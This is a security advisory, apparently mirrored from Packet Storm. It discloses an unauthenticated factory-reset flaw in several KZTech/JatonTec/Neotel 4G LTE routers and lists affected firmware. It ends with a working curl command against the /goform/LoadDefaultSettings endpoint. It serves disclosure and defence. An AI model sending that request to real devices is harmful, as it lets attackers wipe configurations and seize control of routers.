Exploit for KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Unauthenticated Factory Reset

Name: Exploit for KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Unauthenticated Factory Reset
Rating: 5 (146 reviews)
2021-03-19 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:161888
KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 Unauthenticated Factory Reset  
  
  
Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd.  
Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk  
http://www.jatontec.com/products/show.php?itemid=258  
http://www.jatontech.com/CAT12.html#_pp=105_564  
http://www.kzbtech.com/AM3300V.html  
https://neotel.mk/ostanati-paketi-2/  
  
Affected version: Model | Firmware  
-------|---------  
JT3500V | 2.0.1B1064  
JT3300V | 2.0.1B1047  
AM6200M | 2.0.0B3210  
AM6000N | 2.0.0B3042  
AM5000W | 2.0.0B3037  
AM4200M | 2.0.0B2996  
AM4100V | 2.0.0B2988  
AM3500MW | 2.0.0B1092  
AM3410V | 2.0.0B1085  
AM3300V | 2.0.0B1060  
AM3100E | 2.0.0B981  
AM3100V | 2.0.0B946  
AM3000M | 2.0.0B21  
KZ7621U | 2.0.0B14  
KZ3220M | 2.0.0B04  
KZ3120R | 2.0.0B01  
  
Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi  
& VoIP CPE product specially designed to enable quick and easy  
LTE fixed data service deployment for residential and SOHO customers.  
It provides high speed LAN, Wi-Fi and VoIP integrated services  
to end users who need both bandwidth and multi-media data service  
in residential homes or enterprises. The device has 2 Gigabit LAN  
ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and  
CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing  
and firewall software for security. It provides an effective  
all-in-one solution to SOHO or residential customers. It can  
deliver up to 1Gbps max data throughput which can be very  
competitive to wired broadband access service.  
  
Desc: The device allows unauthenticated attackers to visit the  
unprotected /goform/LoadDefaultSettings endpoint and reset the  
device to its factory default settings. Once the GET request is  
made, the device will reboot with its default settings allowing  
the attacker to bypass authentication and take full control of  
the system.  
  
Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN  
Linux 2.6.36+ (mips)  
Mediatek APSoC SDK v4.3.1.0  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2021-5642  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php  
  
  
03.02.2021  
  
--  
  
  
$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings  
success  
$